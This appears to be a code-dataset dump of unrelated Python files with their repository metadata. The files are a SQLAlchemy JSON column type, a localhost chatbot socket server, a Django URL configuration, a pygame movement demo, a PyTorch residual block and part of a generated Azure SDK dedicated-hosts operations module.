# encoding=utf-8 """ sqlpharmacy.column_types ~~~~~~~~~~~~~~~~~~~~~~ More database column types """ import json from sqlalchemy.types import TypeDecorator, String class JsonType(TypeDecorator): '''Dumps simple python data structures to json format and stores them as string Convert the data back to original python data structures when read. Differences from sqlalchemy PickleType: PickleType only supports python, JsonType supports a lot of languages Think that you might want to read the data out of database using Java or PHP(or C#...etc). ''' impl = String def process_bind_param(self, value, dialect): if value is not None: value = json.dumps(value) return value def process_result_value(self, value, dialect): if value is not None: value = json.loads(value) return value
[ "1220149242@qq.com" ]
1220149242@qq.com
ec45d45f973e36dc0e484153ced1934b3170084f
c672f9ba29546468beccbda2aaf892af41dd453a
/tcp.py
b3e26c6d05b61cc89f9c44ee33749872165b9fb8
[]
no_license
ArthonKorea/artchatbot
70773c9064f414f24a4cf34ac5270c60dee03fc8
e2dcb82b18b202ad33cda8fe49b1079eafee74ef
refs/heads/master
2021-01-01T06:01:37.182985
2017-07-18T13:19:40
2017-07-18T13:19:40
97,331,990
0
0
null
null
null
null
UTF-8
Python
false
false
901
py
import socket import chatbot def Main(): host = "localhost" port = 8000 mySocket = socket.socket() mySocket.bind((host, port)) mySocket.listen(1) conn, addr = mySocket.accept() print("Connection from: " + str(addr)) while True: data = conn.recv(1024).decode() if not data: break if "init" in str(data): conn.send("init/안녕하세요 저는 **라는 작품이에요".encode()) continue print("from connected user: " + str(data)) Words = bot.Conversation(str(data)) Translated_Words = bot.Translating_Word(Words) Output = bot.Answering(Translated_Words) #Output ="안녕" data = "response/"+str(Output) print("respon: " + str(Output)) conn.send(data.encode()) conn.close() if __name__ == '__main__': bot = chatbot.bot() Main()
[ "skawls5028@gmail.com" ]
skawls5028@gmail.com
aae84273d14923a5fb83bf35b9b0e6a31ea3d1af
a6270537b5c6d924fa6353a8f0328e07c71a0366
/numbasltiprovider/urls.py
c12994c32a9c81f0df352e00b8c9d1aa5310f5c7
[ "Apache-2.0" ]
permissive
oscarsiles/numbas-lti-provider
9b993175a6b6463a974373c7bdb2c9f38b057b89
ef7080a2593a800a1b9630c746e4f8667e2ec42d
refs/heads/master
2020-08-20T03:47:54.399198
2020-08-05T13:44:16
2020-08-05T13:44:16
215,979,486
0
0
NOASSERTION
2019-10-18T08:39:09
2019-10-18T08:39:09
null
UTF-8
Python
false
false
519
py
from django.conf import settings from django.conf.urls import url, include from django.conf.urls.static import static from django.contrib import admin urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^', include('numbas_lti.urls')), ]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) if settings.DEBUG: try: import debug_toolbar urlpatterns = [ url(r'^__debug__/', include(debug_toolbar.urls)), ] + urlpatterns except ImportError: pass
[ "christianperfect@gmail.com" ]
christianperfect@gmail.com
2fb33dbd42a0f97323aa597b2052a24849bb55e3
9eb4ce67a7b7be515972be3149de488e6e78a4a7
/Protótipos/python/Movement (fluid)/game.py
6e61723e7a2420395fce5b4f3f0837f474af9372
[]
no_license
wellingtonraam/projetos-jogos
987f83da0ac82dc7ce6e4575feb7abba141aa939
3f76a8fb40d6bc9ca0954e80f225a83fa7c734dd
refs/heads/master
2020-04-18T10:11:55.729549
2020-03-21T16:00:47
2020-03-21T16:00:47
167,459,892
0
0
null
null
null
null
UTF-8
Python
false
false
2,331
py
import sys, pygame ### author: Wellington Ramos || email: wellingtonraam@gmail.com ### Inicialize the game ### pygame.init() ### screen size and name ### size = width, height = 640, 480 screen = pygame.display.set_mode(size) pygame.display.set_caption("Character movement") ### fps ### clock = pygame.time.Clock() ### test if playing ### playing = True ### colors ### white = 255, 255, 255 purple = 142, 68, 173 ### Point x and y of the screen ### py = 0 px = 0 ### functions to draw player ### def player(x, y): pygame.draw.rect(screen, purple, pygame.Rect(x, y, 40, 40)) ### Listener Keyboard Events ### pressed = True controlkey = [False, False, False, False] key = pygame.K_UP ### Checking which key was pressed and changing the character's x or y point ### def check_keys_py(py): if controlkey[0]: py += 1 if controlkey[1]: py -= 1 return py def check_keys_px(px): if controlkey[2]: px += 1 if controlkey[3]: px -= 1 return px ### Game loop ### while playing: ### Keyboard Event Listener ### for event in pygame.event.get(): if event.type == pygame.QUIT: playing = False sys.exit() if event.type == pygame.KEYUP: pressed = False if event.key == pygame.K_UP: controlkey[0] = pressed if event.key == pygame.K_DOWN: controlkey[1] = pressed if event.key == pygame.K_LEFT: controlkey[2] = pressed if event.key == pygame.K_RIGHT: controlkey[3] = pressed if event.type == pygame.KEYDOWN: pressed = True if event.key == pygame.K_UP: controlkey[0] = pressed if event.key == pygame.K_DOWN: controlkey[1] = pressed if event.key == pygame.K_LEFT: controlkey[2] = pressed if event.key == pygame.K_RIGHT: controlkey[3] = pressed py = check_keys_py(py) px = check_keys_px(px) ### clean screen ### screen.fill(white) ### Create player (rectangle for collision) ### y = (240 - (20 + py)) x = (320 - (20 + px)) ### draw player ### player(x, y) ### Refresh screen ### pygame.display.flip() clock.tick(60)
[ "wellingtonraam@gmail.com" ]
wellingtonraam@gmail.com
0ea60583881a8cf87ab67946e182928fa337e2f7
e2a465c3fd63519a68d2515e6460e8e7179365ca
/models/Generator/modules.py
cf3282ce178d5f58948d96a16d8b7ac55810324a
[]
no_license
dongyyyyy/Contrast_enhanced_GAN
4c621aaec5faf280fcd4cd7900e1780892e26f77
bfa4906441b0799ae3e2490ff763260b191de794
refs/heads/master
2023-08-03T13:03:30.997329
2021-09-13T10:53:23
2021-09-13T10:53:23
403,494,868
1
0
null
null
null
null
UTF-8
Python
false
false
2,145
py
import torch.nn as nn class ResidualBlock(nn.Module): def __init__(self,in_features,norm_layer='instance',kernel_size=3,dropout_p=0.,use_bias=False,padding_type ='reflect'): super(ResidualBlock,self).__init__() self.conv = self.make_blocks(kernel_size=kernel_size,in_features=in_features,padding_type=padding_type,norm_layer=norm_layer,dropout_p=dropout_p,use_bias=use_bias) def make_blocks(self,kernel_size=3,in_features=256,padding_type='reflect',norm_layer='instance',dropout_p=0.,use_bias=False): conv_block = [] conv_p = 0 if padding_type == 'reflect': conv_block += [nn.ReflectionPad2d(1)] elif padding_type =='replicate': conv_block += [nn.ReplicationPad2d(1)] else: conv_p = 1 conv_block += [nn.Conv2d(in_channels=in_features,out_channels=in_features,kernel_size=kernel_size,padding=conv_p,bias=use_bias)] if norm_layer == 'instance': conv_block += [nn.InstanceNorm2d(num_features=in_features,affine=False,track_running_stats=False)] elif norm_layer == 'batch': conv_block += [nn.BatchNorm2d(num_features=in_features,affine=True,track_running_stats=True)] conv_block += [nn.ReLU(inplace=True)] if dropout_p > 0.: conv_block += [nn.Dropout(dropout_p)] conv_p = 0 if padding_type == 'reflect': conv_block += [nn.ReflectionPad2d(1)] elif padding_type == 'replicate': conv_block += [nn.ReplicationPad2d(1)] else: conv_p = 1 conv_block += [ nn.Conv2d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size, padding=conv_p, bias=use_bias)] if norm_layer == 'instance': conv_block += [nn.InstanceNorm2d(num_features=in_features, affine=False, track_running_stats=False)] elif norm_layer == 'batch': conv_block += [nn.BatchNorm2d(num_features=in_features, affine=True, track_running_stats=True)] return nn.Sequential(*conv_block) def forward(self,x): return self.conv(x)
[ "dongyoung0218@gmail.com" ]
dongyoung0218@gmail.com
45e7ad2daa08b47300fc90982729d3862f4652cb
b806560b367d420bf413d7bac002199741e151c9
/24pro.py
b14d92381fb1bef0388380f391eb1bc9dc2d64e7
[]
no_license
umadevic/pro.py
dca7beadc62aa042779b165bc73dabb8647dde19
5e521aa8591593e56315500b224d2c15c8794fad
refs/heads/master
2020-06-23T16:08:36.430856
2019-07-24T17:42:30
2019-07-24T17:42:30
198,673,904
0
0
null
null
null
null
UTF-8
Python
false
false
281
py
#a mi=int(input()) n9=2**mi list1=[] for i in range(0,n9): l=bin(i)[2:].zfill(mi) if(len(l)<len(bin(2**mi-1)[2:])): list1.append([l.count("1"),l]) else: list1.append([l.count("1"),l]) list1.sort() for i in range(len(list1)): print(list1[i][1])
[ "noreply@github.com" ]
noreply@github.com
48dee7176bb8171d5e34ce3b814a3824745949bb
974c5a4f101d0e6f4dfa5fc2f7c641c9d2bd8184
/sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2021_03_01/operations/_dedicated_hosts_operations.py
51cb4faf00fcd17afa1aa62853dffed3a1b72cf3
[ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
permissive
gaoyp830/azure-sdk-for-python
4816f04c554dcffb7510a6b7044b0c86a2dd32e1
1c66defa502b754abcc9e5afa444ca03c609342f
refs/heads/master
2022-10-20T21:33:44.281041
2022-09-29T17:03:13
2022-09-29T17:03:13
250,355,505
0
0
MIT
2020-03-26T19:42:13
2020-03-26T19:42:12
null
UTF-8
Python
false
false
44,268
py
# pylint: disable=too-many-lines # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload from urllib.parse import parse_qs, urljoin, urlparse from azure.core.exceptions import ( ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, ResourceNotModifiedError, map_error, ) from azure.core.paging import ItemPaged from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpResponse from azure.core.polling import LROPoller, NoPolling, PollingMethod from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.utils import case_insensitive_dict from azure.mgmt.core.exceptions import ARMErrorFormat from azure.mgmt.core.polling.arm_polling import ARMPolling from .. import models as _models from ..._serialization import Serializer from .._vendor import _convert_request, _format_url_section T = TypeVar("T") ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] _SERIALIZER = Serializer() _SERIALIZER.client_side_validation = False def build_create_or_update_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if content_type is not None: _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs) def build_update_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if content_type is not None: _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="PATCH", url=_url, params=_params, headers=_headers, **kwargs) def build_delete_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") return HttpRequest(method="DELETE", url=_url, params=_params, **kwargs) def build_get_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, *, expand: Optional[Union[str, "_models.InstanceViewTypes"]] = None, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters if expand is not None: _params["$expand"] = _SERIALIZER.query("expand", expand, "str") _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs) def build_list_by_host_group_request( resource_group_name: str, host_group_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs) class DedicatedHostsOperations: """ .. warning:: **DO NOT** instantiate this class directly. Instead, you should access the following operations through :class:`~azure.mgmt.compute.v2021_03_01.ComputeManagementClient`'s :attr:`dedicated_hosts` attribute. """ models = _models def __init__(self, *args, **kwargs): input_args = list(args) self._client = input_args.pop(0) if input_args else kwargs.pop("client") self._config = input_args.pop(0) if input_args else kwargs.pop("config") self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer") self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer") def _create_or_update_initial( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHost, IO], **kwargs: Any ) -> _models.DedicatedHost: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] content_type = content_type or "application/json" _json = None _content = None if isinstance(parameters, (IO, bytes)): _content = parameters else: _json = self._serialize.body(parameters, "DedicatedHost") request = build_create_or_update_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, api_version=api_version, content_type=content_type, json=_json, content=_content, template_url=self._create_or_update_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 201]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) if response.status_code == 200: deserialized = self._deserialize("DedicatedHost", pipeline_response) if response.status_code == 201: deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized _create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @overload def begin_create_or_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: _models.DedicatedHost, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Create or update a dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Create Dedicated Host. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHost :keyword content_type: Body Parameter content-type. Content type parameter for JSON body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @overload def begin_create_or_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: IO, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Create or update a dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Create Dedicated Host. Required. :type parameters: IO :keyword content_type: Body Parameter content-type. Content type parameter for binary body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @distributed_trace def begin_create_or_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHost, IO], **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Create or update a dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Create Dedicated Host. Is either a model type or a IO type. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHost or IO :keyword content_type: Body Parameter content-type. Known values are: 'application/json'. Default value is None. :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._create_or_update_initial( # type: ignore resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, parameters=parameters, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized if polling is True: polling_method = cast(PollingMethod, ARMPolling(lro_delay, **kwargs)) # type: PollingMethod elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_create_or_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore def _update_initial( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHostUpdate, IO], **kwargs: Any ) -> _models.DedicatedHost: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] content_type = content_type or "application/json" _json = None _content = None if isinstance(parameters, (IO, bytes)): _content = parameters else: _json = self._serialize.body(parameters, "DedicatedHostUpdate") request = build_update_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, api_version=api_version, content_type=content_type, json=_json, content=_content, template_url=self._update_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized _update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @overload def begin_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: _models.DedicatedHostUpdate, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Update an dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Update Dedicated Host operation. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHostUpdate :keyword content_type: Body Parameter content-type. Content type parameter for JSON body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @overload def begin_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: IO, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Update an dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Update Dedicated Host operation. Required. :type parameters: IO :keyword content_type: Body Parameter content-type. Content type parameter for binary body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @distributed_trace def begin_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHostUpdate, IO], **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Update an dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Update Dedicated Host operation. Is either a model type or a IO type. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHostUpdate or IO :keyword content_type: Body Parameter content-type. Known values are: 'application/json'. Default value is None. :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._update_initial( # type: ignore resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, parameters=parameters, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized if polling is True: polling_method = cast(PollingMethod, ARMPolling(lro_delay, **kwargs)) # type: PollingMethod elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore def _delete_initial( # pylint: disable=inconsistent-return-statements self, resource_group_name: str, 